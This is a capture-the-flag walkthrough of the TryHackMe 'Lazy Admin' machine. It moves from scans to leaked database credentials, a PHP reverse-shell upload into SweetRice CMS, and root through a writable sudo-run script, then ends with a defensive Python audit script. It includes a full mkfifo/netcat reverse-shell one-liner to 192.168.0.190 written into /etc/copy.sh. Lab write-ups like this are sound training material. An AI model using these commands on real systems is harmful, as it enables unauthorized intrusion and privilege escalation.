Lazy Admin TryhackMe

Easy Linux machine to practice your skills

Enumeration

I started a Rustscan scan and found both an SSH service and a web server.

rustscan -a 10.10.48.129 -- -A -sC -sV        
The scan shows two open ports: port 80 and port 22. Port 80 is running Apache.

I went to the web server in my browser and found a default Apache landing page:

We ran DirBuster to enumerate directories.

We discovered a directory named "/content", which we then opened in the browser.


We discovered a webpage for SweetRice CMS, a content management system for managing websites. Therefore, we ran Gobuster on the "/content" directory.

gobuster dir -u 10.10.118.244 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

At /as I got this

We found more directories. The “/as” directory contains a login page, but we don’t have credentials to log in, so we checked the other directories, including “/inc”.

In the “/content/inc” directory we found a “mysql_backup/” folder, so we checked that folder.

We successfully downloaded a file that may contain valuable information, prompting us to investigate the MySQL backup database.

I discovered the username and the password hash in this file. Then, I used CrackStation to crack the hash.

Now we have a username and password, so we can try to log in at the “/as” directory we found.

With the obtained credentials, we successfully logged in to the SweetRice Dashboard.

In the Ads section, we can add a script to establish a reverse connection. I downloaded a PHP reverse shell script from
upload now

After clicking "Done," the script was uploaded. Subsequently, we initiated a Netcat listener.

nc -lvnp 1234        

Now, we need to click on our reverse shell to establish a connection.

Now we can read the user flag with the “cat user.txt” command, and we can also upgrade this shell.

Privilege Escalation

So, we checked what permissions we have using the sudo -l command.

sudo -l        

This script runs a bash script, “/etc/copy.sh”. Let’s check this file.

$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f" > /etc/copy.sh
        


Begin a Netcat listener to receive the reverse shell, then execute the modified file to establish the reverse connection.

Looks like we've attained root access!
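The escalation works because a file executed through sudo can be modified by an unprivileged user. The check below for that condition is an added example, not part of the original write-up; the function names, the `trusted_uids` parameter and the temporary fixture files (standing in for the sudo-allowed script and /etc/copy.sh) are assumptions made for illustration.

```python
import os
import re
import stat
import tempfile

# Absolute paths mentioned in the script text (simple token match, not a shell parser).
PATH_RE = re.compile(r"(?<![\w.])/(?:[\w.+-]+/)*[\w.+-]+")

def weaknesses(path, trusted_uids=(0,)):
    """Return the reasons a non-trusted user could change what `path` contains."""
    st = os.stat(path)
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    reasons = []
    if st.st_uid not in trusted_uids:
        reasons.append("owned by untrusted uid %d" % st.st_uid)
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    # A writable parent lets anyone replace the file unless the sticky bit is set.
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory is world-writable")
    return reasons

def audit(script_path, trusted_uids=(0,)):
    """Check a sudo-allowed script and every existing file it references."""
    with open(script_path, encoding="utf-8", errors="replace") as fh:
        candidates = [script_path] + sorted(set(PATH_RE.findall(fh.read())))
    findings = {}
    for path in candidates:
        if os.path.isfile(path):
            reasons = weaknesses(path, trusted_uids)
            if reasons:
                findings[path] = reasons
    return findings

def demo(helper_mode):
    """Constructed fixture: a wrapper that runs a helper with the given mode."""
    tmp = tempfile.mkdtemp()
    helper = os.path.join(tmp, "copy.sh")      # stands in for /etc/copy.sh
    wrapper = os.path.join(tmp, "wrapper.sh")  # hypothetical sudo-allowed script
    for path, body in ((helper, "echo backup\n"), (wrapper, "sh %s\n" % helper)):
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, 0o755)
    os.chmod(helper, helper_mode)
    return audit(wrapper, trusted_uids=(0, os.getuid())), helper

if __name__ == "__main__":
    print(demo(0o757)[0])  # helper flagged as world-writable
    print(demo(0o755)[0])  # no findings
```

On a real host, run `audit()` as root against each command listed in the sudoers policy and leave `trusted_uids` at its default so that only root-owned files pass.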


